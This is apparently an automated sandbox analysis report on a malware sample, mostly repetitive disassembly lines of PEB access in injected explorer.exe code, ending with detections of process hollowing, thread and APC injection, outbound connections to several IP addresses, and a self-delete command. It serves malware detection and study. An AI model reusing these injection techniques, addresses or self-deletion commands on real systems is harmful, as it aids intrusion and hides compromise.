          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05043D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05073D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05057D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05032D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05061DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05061DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05061DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05104015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05104015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05050050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05050050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0510070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05034F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05034F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05108F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05063B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05063B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05041B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05041B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05048794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05105BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05068E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05048A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05053A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05074A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05074A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 202.66.173.116 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.23.162.163 80
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.99.84 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.91.239.112 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.106.16.223 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeMemory written: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 13E0000
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: explorer.exe, 00000007.00000002.911089779.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp, explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
